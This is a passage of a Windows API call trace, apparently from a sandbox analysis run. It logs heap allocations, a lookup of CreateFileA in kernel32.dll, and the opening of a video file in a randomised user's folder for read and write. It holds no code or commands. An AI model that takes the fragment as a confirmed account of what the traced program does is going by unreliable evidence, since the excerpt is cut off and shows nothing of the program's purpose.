RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.155] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.158] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a78 [0042.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.158] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0042.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.158] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0042.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x36) returned 0x7c2080 [0042.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", cchWideChar=54, lpMultiByteStr=0x7c2080, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpUsedDefaultChar=0x0) returned 54 [0042.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.160] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\9c5dg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c) returned 0x7db300 [0042.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x7db300, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv") returned 54 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.162] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.164] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, 